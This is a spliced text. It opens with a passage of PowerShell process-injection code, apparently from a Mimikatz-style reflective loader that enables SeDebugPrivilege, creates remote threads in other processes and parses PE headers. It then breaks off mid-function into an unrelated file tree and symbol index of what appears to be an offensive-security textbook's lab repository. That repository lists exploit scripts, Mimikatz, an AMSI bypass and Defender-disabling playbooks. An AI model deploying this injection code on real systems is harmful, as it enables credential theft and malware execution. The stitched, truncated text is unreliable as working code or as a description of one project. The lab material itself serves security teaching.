$TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
$TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
[System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)
# No previous-state buffer is requested (the last two arguments are null).
$Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value
if (($Result -eq $false) -or ($ErrorCode -ne 0))
{
# Failure (including "not all privileges assigned", i.e. the account does not
# hold SeDebugPrivilege at all) is intentionally swallowed here.
#Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode" #todo need to detect if already set
}
[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
}
Function Invoke-CreateRemoteThread
{
# Starts a thread at $StartAddress (with optional argument $ArgumentPtr) inside
# the process referred to by $ProcessHandle, choosing the API by OS version:
# NtCreateThreadEx on Vista/7, CreateRemoteThread everywhere else. Both delegates
# come from $Win32Functions.
# Returns the new thread handle, or [IntPtr]::Zero when CreateRemoteThread
# failed (only a verbose message is written in that case - callers must check
# the returned handle themselves). Throws when NtCreateThreadEx yields no handle.
# Parameter positions start at 1 rather than 0; positional binding still follows
# the relative order.
Param(
[Parameter(Position = 1, Mandatory = $true)]
[IntPtr]
$ProcessHandle,
[Parameter(Position = 2, Mandatory = $true)]
[IntPtr]
$StartAddress,
[Parameter(Position = 3, Mandatory = $false)]
[IntPtr]
$ArgumentPtr = [IntPtr]::Zero,
[Parameter(Position = 4, Mandatory = $true)]
[System.Object]
$Win32Functions
)
[IntPtr]$RemoteThreadHandle = [IntPtr]::Zero
$OSVersion = [Environment]::OSVersion.Version
#Vista and Win7 (6.0 <= version < 6.2): NtCreateThreadEx is only registered in
#$Win32Functions for this range, so the version test must match the one used
#when the delegate was created.
if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
{
Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress"
# Argument order follows the delegate signature declared for NtCreateThreadEx;
# the handle comes back through the first ([Ref]) argument and $RetVal is the
# function's status code. The numeric literals are passed through unexplained
# in the original - NOTE(review): confirm their meaning against the
# NtCreateThreadEx prototype before changing any of them.
$RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
# NOTE(review): the delegate has no SetLastError attribute, so this value may be
# stale; $RetVal is the more reliable failure indicator here.
$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ($RemoteThreadHandle -eq [IntPtr]::Zero)
{
Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
}
}
#Every other version (XP, and Windows 8 or later - the verbose text below only
#names XP/8 but this branch is taken on newer releases too).
else
{
Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress"
# The third argument is CreateRemoteThread's stack size; 0xFFFF is passed as a
# pointer-sized value to match the delegate's parameter type.
$RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
}
# Only reachable with a null handle on the CreateRemoteThread path (the other
# path throws); the failure is logged, not raised.
if ($RemoteThreadHandle -eq [IntPtr]::Zero)
{
Write-Verbose "Error creating remote thread, thread handle is null"
}
return $RemoteThreadHandle
}
Function Get-ImageNtHeaders
{
    # Reads the IMAGE_NT_HEADERS of a PE image already mapped at $PEHandle, using
    # the structure types supplied in $Win32Types. Returns an object carrying
    # NtHeadersPtr (address of the NT headers), IMAGE_NT_HEADERS (the 64- or
    # 32-bit structure, chosen from OptionalHeader.Magic) and PE64Bit.
    # Throws if the NT header signature is not 'PE\0\0' (0x00004550).
    # The DOS header's 'MZ' marker is not re-validated here; the caller is
    # expected to have checked it beforehand (and may have overwritten it).
    Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [IntPtr]
        $PEHandle,
        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Types
    )
    $Info = New-Object System.Object
    $DosHdr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
    # e_lfanew is the offset of the NT headers from the image base.
    [IntPtr]$HeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$DosHdr.e_lfanew))
    $Info | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $HeadersPtr
    # Read the 64-bit layout first; the code relies on Signature and
    # OptionalHeader.Magic being at the same offsets in both layouts so the
    # bitness can be decided from this read.
    $Hdr64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($HeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
    if ($Hdr64.Signature -ne 0x00004550)
    {
        throw "Invalid IMAGE_NT_HEADER signature."
    }
    $Is64Bit = ($Hdr64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
    if ($Is64Bit)
    {
        $Headers = $Hdr64
    }
    else
    {
        # Not PE32+: re-read with the 32-bit optional header layout.
        $Headers = [System.Runtime.InteropServices.Marshal]::PtrToStructure($HeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
    }
    $Info | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $Headers
    $Info | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $Is64Bit
    return $Info
}
#This function gathers the information needed to allocate space in memory for the PE
Function Get-PEBasicInfo
{
Param(
[Parameter(
gitextract_9jdookxc/
├── .gitignore
├── CloudSetup/
│ ├── README.md
│ ├── build-images.sh
│ ├── delete-old-images.sh
│ ├── delete-orphaned-snaps.sh
│ ├── deprovision.sh
│ ├── eksall.template
│ ├── find-orphaned-snaps.sh
│ ├── install-cloud-tools.sh
│ ├── kali-base/
│ │ ├── config.sh
│ │ └── kali.hcl
│ ├── provision.sh
│ ├── server-2016-base/
│ │ ├── bootstrap.ps1
│ │ ├── server2016_template.json
│ │ └── user_data.ps1
│ └── server-2019-base/
│ ├── bootstrap.ps1
│ ├── server2019_template.json
│ └── user_data.ps1
├── README.md
├── ch02/
│ ├── client.py
│ ├── fmt_str.c
│ ├── hello.asm
│ ├── hello.c
│ ├── ifelse.c
│ ├── meet.c
│ ├── memory.c
│ ├── targets
│ └── while_ex.c
├── ch03/
│ ├── heapme_demo.c
│ ├── hello.c
│ ├── leak-bof-exploit.py
│ └── leak-bof.c
├── ch04/
│ ├── students-patched.c
│ ├── students.c
│ └── students.csv
├── ch05/
│ ├── myAtoi
│ ├── myAtoi.c
│ ├── myProg
│ └── myProg.c
├── ch07/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch07_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── addshare.txt
│ │ │ │ │ │ ├── covenant.patch
│ │ │ │ │ │ └── shells/
│ │ │ │ │ │ ├── build_csharp.sh
│ │ │ │ │ │ ├── build_go.sh
│ │ │ │ │ │ ├── build_nim.sh
│ │ │ │ │ │ ├── csharp.template
│ │ │ │ │ │ ├── execute.template
│ │ │ │ │ │ ├── go.mod
│ │ │ │ │ │ ├── go.sum
│ │ │ │ │ │ ├── go.template
│ │ │ │ │ │ └── nim.template
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ └── usermods.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ └── README.md
├── ch08/
│ └── winlogbeat.yml
├── ch10/
│ ├── ch10_6
│ ├── ch10_6_exploit.py
│ ├── getenv.c
│ ├── meet.c
│ ├── meet_exploit.py
│ ├── overflow.c
│ ├── shellcode.c
│ ├── smallbuff.c
│ └── smallbuff_exploit.py
├── ch11/
│ ├── README.md
│ ├── exploit1.py
│ ├── exploit2.py
│ ├── exploit3-v2.py
│ ├── exploit3.py
│ ├── exploit4.py
│ ├── vuln
│ └── vuln.c
├── ch12/
│ ├── bzImage
│ ├── initramfs.cpio
│ ├── run1.sh
│ ├── run2.sh
│ ├── run3.sh
│ ├── run4.sh
│ ├── run5.sh
│ ├── shared/
│ │ ├── .ash_history
│ │ ├── exploit1/
│ │ │ └── exploit.c
│ │ ├── exploit2/
│ │ │ └── exploit.c
│ │ ├── exploit3/
│ │ │ └── exploit.c
│ │ ├── exploit4/
│ │ │ └── exploit.c
│ │ ├── exploit5/
│ │ │ └── exploit.c
│ │ └── leak.c
│ ├── stackprotector-disabled/
│ │ ├── bzImage
│ │ └── vmlinux
│ └── vmlinux
├── ch13/
│ ├── hello.c
│ ├── meet.c
│ ├── prosshd1.py
│ ├── prosshd2.py
│ ├── prosshd3.py
│ └── prosshd_dep.py
├── ch14/
│ ├── binaries/
│ │ └── DBUtil_2_3.Sys
│ ├── dbutil_exploit/
│ │ ├── Cargo.toml
│ │ └── src/
│ │ ├── bin/
│ │ │ ├── exploit.rs
│ │ │ └── ioctlcall.rs
│ │ └── lib.rs
│ ├── dbutil_exploit.c
│ ├── dbutil_exploit.py
│ └── ioctlcall.py
├── ch15/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch15_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── Invoke-Mimikatz.ps1
│ │ │ │ │ │ └── amsi.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── target_customizations/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── get-ips.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ └── README.md
├── ch16/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch16_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── util_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── terminate-util.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ ├── README.md
│ └── passwords.txt
├── ch17/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch17_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── util_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ └── usermods.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── terminate-util.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ ├── README.md
│ └── Run-SDProp.ps1
├── ch18/
│ ├── name
│ ├── name2
│ └── test
├── ch19/
│ ├── lab-19-1/
│ │ └── README.txt
│ ├── lab-19-2/
│ │ ├── README.txt
│ │ ├── facet-search.py
│ │ ├── install.sh
│ │ └── mqtt-search.py
│ └── lab-19-3/
│ ├── README.txt
│ └── mqtt-scan.py
├── ch21/
│ ├── lab-21-1/
│ │ ├── README.txt
│ │ └── lab-21-1.sh
│ ├── lab-21-2/
│ │ ├── lab-21-2.sh
│ │ └── ssi
│ ├── lab-21-3/
│ │ └── README.txt
│ ├── lab-21-4/
│ │ └── README.txt
│ └── lab-21-5/
│ └── README.txt
├── ch22/
│ ├── Analyze/
│ │ ├── README.txt
│ │ ├── cmds.txt
│ │ ├── decode-inspectrum.py
│ │ └── install.sh
│ ├── Capture/
│ │ ├── README.txt
│ │ ├── remote1-1off-4m-316mhz
│ │ ├── remote1-1on-4m-316mhz
│ │ ├── remote1-2off-4m-316mhz
│ │ ├── remote1-2on-4m-316mhz
│ │ ├── remote1-3off-4m-316mhz
│ │ ├── remote1-3on-4m-316mhz
│ │ ├── remote2-1off-4m-316mhz
│ │ ├── remote2-1on-4m-316mhz
│ │ ├── remote2-2off-4m-316mhz
│ │ ├── remote2-2on-4m-316mhz
│ │ ├── remote2-3off-4m-316mhz
│ │ ├── remote2-3on-4m-316mhz
│ │ └── remote_analysis.grc
│ ├── Execute/
│ │ ├── README.txt
│ │ └── test-execute.grc
│ ├── Preview/
│ │ ├── README.txt
│ │ └── test-preview.grc
│ └── Replay/
│ ├── README.txt
│ └── remote_analysis_replay.grc
├── ch24/
│ ├── Dockerfile
│ ├── README.md
│ └── labs/
│ ├── lab1/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ └── main.c
│ ├── lab2/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── main.c
│ │ ├── protocol.c
│ │ └── protocol.h
│ ├── lab3/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── main.c
│ │ ├── main.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ └── protocol.py
│ ├── lab4/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── main.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ ├── lab5/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── fuzzer.py
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── multiboot2.h
│ │ ├── port_fuzzer.py
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ ├── lab6/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── fuzzer.py
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── msr_fuzzer.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ └── lab7/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── fuzzer.py
│ ├── guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── msr_fuzzer.py
│ ├── multiboot2.h
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ └── remotemem.py
├── ch25/
│ ├── Dockerfile
│ └── labs/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── guest.py
│ ├── hypercall.py
│ ├── hyperv_guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── multiboot2.h
│ ├── pci.py
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ ├── remotemem.py
│ ├── session.py
│ ├── time_sync.py
│ └── vmbus.py
├── ch26/
│ ├── Dockerfile
│ └── labs/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── cstruct.py
│ ├── ehci.py
│ ├── guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── multiboot2.h
│ ├── pci.py
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ ├── qemu_guest.py
│ ├── qemu_xpl.py
│ ├── remotemem.py
│ ├── session.py
│ └── trigger.py
├── ch27/
│ ├── README.md
│ └── lab/
│ ├── ansible/
│ │ ├── ansible.cfg
│ │ ├── ch27_playbook.yml
│ │ ├── roles/
│ │ │ ├── common/
│ │ │ │ └── default/
│ │ │ │ └── main.yml
│ │ │ ├── kali_customizations/
│ │ │ │ ├── files/
│ │ │ │ │ └── getEC2WinCreds.py
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── victim1/
│ │ │ └── tasks/
│ │ │ └── main.yml
│ │ └── vars/
│ │ ├── users.yml
│ │ └── vars.yml
│ ├── apps/
│ │ └── webapp/
│ │ └── index.js
│ ├── build.sh
│ ├── destroy.sh
│ ├── terraform/
│ │ ├── data.tf
│ │ ├── documents/
│ │ │ └── perform_healthcheck.yml
│ │ ├── ec2.tf
│ │ ├── iam.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── output.tf
│ │ ├── s3.tf
│ │ ├── variables.tf
│ │ └── vpc.tf
│ └── terraform2/
│ ├── build2.sh
│ ├── data.tf
│ ├── destroy2.sh
│ ├── ec2.tf
│ ├── inventory.tmpl
│ ├── main.tf
│ ├── output.tf
│ ├── variables.tf
│ └── vpc.tf
├── ch28/
│ ├── Metasploit.md
│ └── get_managed_id.ps1
├── ch29/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch29_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ └── defaults/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── docker/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── daemon.json
│ │ │ │ │ │ └── override.conf
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── kali_customizations/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── easy/
│ │ │ └── Dockerfile
│ │ ├── nmap/
│ │ │ ├── Dockerfile
│ │ │ └── output/
│ │ │ └── test
│ │ ├── targets/
│ │ │ ├── docker-compose.yml
│ │ │ └── web/
│ │ │ ├── .dockerignore
│ │ │ ├── .gitignore
│ │ │ ├── Dockerfile
│ │ │ ├── app.py
│ │ │ ├── requirements.txt
│ │ │ └── templates/
│ │ │ ├── base.html
│ │ │ └── index.html
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── output.tf
│ │ ├── variables.tf
│ │ └── vpc.tf
│ └── README.md
└── ch30/
├── Lab/
│ ├── .gitignore
│ ├── badperms.yml
│ ├── build.sh
│ ├── container.yml
│ ├── destroy.sh
│ ├── eksctl.yml
│ ├── ncat-svc.yml
│ └── ncat.yml
└── README.md
SYMBOL INDEX (1168 symbols across 136 files)
FILE: ch02/fmt_str.c
function main (line 3) | int main(void){
FILE: ch02/hello.c
function main (line 3) | int main(){ // required main function
FILE: ch02/ifelse.c
function main (line 3) | int main(void){
FILE: ch02/meet.c
function greeting (line 4) | void greeting(char *temp1,char *temp2){ // greeting function to say hello
function main (line 9) | int main(int argc, char * argv[]){ // note the format for arguments
FILE: ch02/memory.c
function funct1 (line 8) | void funct1(int c){ // bracket starts function1 block with argument (c)
function main (line 14) | void main (){ // the required main function
FILE: ch02/while_ex.c
function main (line 3) | int main(void){
FILE: ch03/heapme_demo.c
function main (line 9) | int main() {
FILE: ch03/hello.c
function main (line 4) | int main() {
FILE: ch03/leak-bof.c
function vuln (line 5) | void vuln() {
function main (line 12) | int main(int argc, char **argv) {
FILE: ch04/students-patched.c
type Student (line 6) | typedef struct {
function LoadStudents (line 16) | void LoadStudents() {
function ListStudents (line 35) | void ListStudents() {
function ViewStudentGrades (line 42) | int ViewStudentGrades() {
function ChangeStudentGrades (line 55) | void ChangeStudentGrades() {
function main (line 75) | void main(void) {
FILE: ch04/students.c
type Student (line 6) | typedef struct {
function LoadStudents (line 16) | void LoadStudents() {
function ListStudents (line 35) | void ListStudents() {
function ViewStudentGrades (line 42) | int ViewStudentGrades() {
function ChangeStudentGrades (line 57) | void ChangeStudentGrades() {
function main (line 77) | void main(void) {
FILE: ch05/myAtoi.c
function myAtoi (line 4) | int myAtoi(char *str){
function main (line 11) | int main(){
FILE: ch05/myProg.c
function func1 (line 5) | int func1(char* input)
function main (line 15) | int main(int argc, char* argv[])
FILE: ch10/getenv.c
function main (line 6) | int main() {
FILE: ch10/meet.c
function greeting (line 4) | void greeting(char *temp1,char *temp2){ // greeting function to say hello
function main (line 9) | int main(int argc, char * argv[]){ // note the format for arguments
FILE: ch10/overflow.c
function main (line 3) | int main(){
FILE: ch10/shellcode.c
function main (line 10) | int main() { //main function
FILE: ch10/smallbuff.c
function main (line 3) | int main(int argc, char * argv[]){
FILE: ch11/exploit2.py
function exploit (line 8) | def exploit(payload, interactive=False):
function leak_bytes (line 25) | def leak_bytes(payload, name):
FILE: ch11/exploit3-v2.py
function exploit (line 9) | def exploit(payload, interactive=False, leak=False):
function leak_bytes (line 29) | def leak_bytes(payload, name):
FILE: ch11/exploit3.py
function exploit (line 9) | def exploit(payload, interactive=False, leak=False):
function leak_bytes (line 29) | def leak_bytes(payload, name):
FILE: ch11/exploit4.py
function exploit (line 9) | def exploit(payload, interactive=False, leak=False):
function leak_bytes (line 29) | def leak_bytes(payload, name):
FILE: ch11/vuln.c
function auth (line 18) | int auth(int connfd) {
function main (line 29) | int main(void) {
FILE: ch12/shared/exploit1/exploit.c
function save_state (line 10) | void save_state(){
function shell (line 22) | void shell(void){
function escalate_privileges (line 34) | void escalate_privileges(void){
function main (line 52) | int main() {
FILE: ch12/shared/exploit2/exploit.c
function save_state (line 9) | void save_state(){
function shell (line 21) | void shell(void){
function escalate_privileges (line 33) | void escalate_privileges(void){
function main (line 51) | int main() {
FILE: ch12/shared/exploit3/exploit.c
function save_state (line 10) | void save_state(){
function shell (line 22) | void shell(void){
function main (line 34) | int main() {
